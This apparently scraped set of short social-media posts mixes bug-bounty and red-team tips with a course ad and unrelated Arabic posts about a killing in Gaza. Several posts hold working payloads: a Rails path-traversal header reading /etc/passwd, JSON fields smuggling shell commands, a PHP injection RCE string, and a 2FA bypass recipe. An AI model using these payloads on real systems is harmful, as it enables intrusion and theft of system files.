Let's Do some Action via Certificates #ejpt #ine #redteam #rednexus #ewapt #ewaptx #ecppt #Rastalab #APT #offsec #offensivesecurity #redteam #HackTheBox #WebSecurity #C2 #HTB #Evasion #ADAttacks #CyberSecurity #PenetrationTesting #CPTS

⁨ بنقدملك خصومات تاريخية محصلتش قبل كده، بمناسبة الإعلان عن أقوى شراكة في الوطن العربي مع الحليف الأقوى في مجال السايبر سيكيورتي، INE.  قدرنا نوفر خصومات حصرية وهدفنا هو رحلتك التعليمية والاحترافية، اختار الباقة اللي تناسبك ومتضيعش الفرصة دي.  Full Pack 1- 12 شهر وصول

I'm releasing my new tool: DllShimmer 🔥 Weaponize DLL hijacking easily. https://t.co/BPP6dJLzuW - backdoor any function, no reverse engineering - all functions proxied, no program crash - built-in debug info and mutex to every function - more... #redteam #malware #security

Kubernetes Hacking: Attacking Kubernetes Clusters Using The Kubelet API Explore the ways to execute commands within containers, potentially leading to full control over the cluster: https://t.co/DU0vgzIks9 @three_cube

FREE Azure Labs – Cloud Security Projects Looking to gain hands-on experience with Azure Security Technologies? 📌 Microsoft’s official AZ-500 labs provide real-world cloud security engineering projects. Use them to: ✔️ Build and secure your own cloud environment ✔️ Work on

If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: `Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips

🔥 403 turned to 200 🔥 Accessing /admin/settings was answered with 403, but using the "Referrer" HTTP header I was able to access pages that were forbidden! This is a common method to bypass a server side validation that relying on the user accessing only through the website

assetfinder https://t.co/W3QT01FUMb | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: https://t.co/32zTSgMhGx" {} | [[ $(grep -c " https://t.co/32zTSgMhGx") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] \033[0m{}"' 2>/dev/null

1- Turn 2FA 2- Save some authenticated paths like /profile, 3- If website required 2FA from you, put path to access directly without 2FA #bugbountytips

"أرجوكم، تعالوا وأنقذوني" كانت هذه آخر كلماتها قبل أن تُقتل بـ 350 رصاصة. نحن نُقتل على يد وحوش تجاوزوا المرضى النفسيين والسفاحين. هذه هي التجربة المروعة التي عانتها هند رجب في لحظاتها الأخيرة، والتي أُعادة تجسيدها بواسطة الذكاء الاصطناعي .

مُحزن اعتياد العالم على قتل الابرياء! كيف تمر هذه المشاهد بهذه البساطة دون أن يراها احد!!

💰Bug Bounty Tips: Scored a $5,000 bounty via APIs exposed on a Swagger endpoint! 💻 Discovered a Swagger UI showing API endpoints—all endpoints required auth. Instead of stopping there, I tried something different: using an Authorization token and cookies from a different

have you ever tried to do this {"username": "`cat /etc/passwd`", "password": "test"} {"username": "`touch /var/www/html/hack.html`", "password": "test"}

This is the quickest RCE I've ever gotten. The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an #RCE as a surprise. Payload: `&**='.print((`id`)).'` #BugBounty

10) Httpx -l subdomains2.txt -o httpsub.txt 11) Creat private nuclei templets 12) creat https://t.co/FMoLgcLXC6 while true; do nuclei -l httpsub.txt -t ~/Private-Nuclei-Templates/ | anew fuzzresultnuclei9.txt | notify -pc ./provider-config.yaml; sleep 3600; done

let's deep dive into CVES

Worth watching…

what to do after recon look here for my write-up and wait for the next part : https://t.co/FQVrfK5z1M

Tip for hunt and test path:/login/dbconf.php~ By:@momika233 #BugBounty #bugbountytips #pentest #cybersecurity

4. Use your word list to find hidden parameters. Read this well written article by @KathanP19 https://t.co/HpY5akERR1 5. Use your word list to find hidden subdomains, I found 10s of more subdomains using WL created using the common words used in the source. 3/n